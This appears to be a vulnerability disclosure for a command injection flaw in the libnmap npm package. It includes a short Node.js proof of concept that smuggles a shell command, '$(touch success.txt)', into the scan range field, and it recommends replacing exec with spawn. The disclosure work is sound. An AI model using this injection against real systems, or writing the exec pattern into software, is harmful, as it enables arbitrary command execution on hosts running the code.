I would like to report a command injection vulnerability in libnmap.
It allows an attacker to inject arbitrary OS commands instead of a valid network range to be scanned.
module name: libnmapversion:0.4.11npm page: https://www.npmjs.com/package/libnmap
API to access nmap from node.js
101 downloads in the last week
If the attacker is allowed to provide the “range” field for the network scan, she can inject arbitrary OS commands instead of a valid IP range.
const nmap = require('libnmap');
const opts = {
range: [
'scanme.nmap.org',
"x.x.$(touch success.txt)"
]
};
nmap.scan(opts, function(err, report) {
if (err) throw new Error(err);
for (let item in report) {
console.log(JSON.stringify(report[item]));
}
});
N/A use spawn instead of exec
The attacker can run arbitrary OS commands using this module.